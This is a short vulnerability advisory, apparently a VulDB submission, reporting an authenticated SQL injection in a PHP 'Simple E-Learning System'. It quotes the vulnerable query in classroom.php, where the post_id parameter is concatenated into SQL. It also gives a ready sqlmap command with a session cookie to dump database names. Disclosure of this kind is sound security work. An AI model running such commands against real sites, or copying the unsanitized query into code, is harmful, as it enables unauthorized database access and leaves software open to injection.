Title | sql injection in Simple E-Learning System(authenticated) |
---|
Description | the E-Learning System source code url: https://www.sourcecodester.com/php-simple-e-learning-system-source-code
in classroom.php line 42:
code as below
if (isset($_GET['post_id'])) {
$post_id = $_GET['post_id'];
$data_query = mysqli_query($con, "SELECT body FROM posts WHERE id='$post_id'");
$body = mysqli_fetch_array($data_query);
the post_id is directly spliced into the sql query statement,and the $body is directly echo in line 156
so there is a obvious sql injection, you just need a authenticated user。we can use sqlmap to exploit it .Command as below, and the cookie as your own user
python .\sqlmap.py -u "http://127.0.0.1/vcs/classRoom.php?post_id=1&classCode=class101_a" --cookie="PHPSESSID=12blsndrn1t8gcphdj864gbrcu" --dbs |
---|
Source | ⚠️ https://www.sourcecodester.com/php-simple-e-learning-system-source-code |
---|
User | wuerror (ID 30660) |
---|
Submission | 05.08.2022 05:01 (2 years ago) |
---|
Moderation | 05.08.2022 07:13 (2 hours later) |
---|
Status | Akzeptiert |
---|
VulDB Entry | 205615 |
---|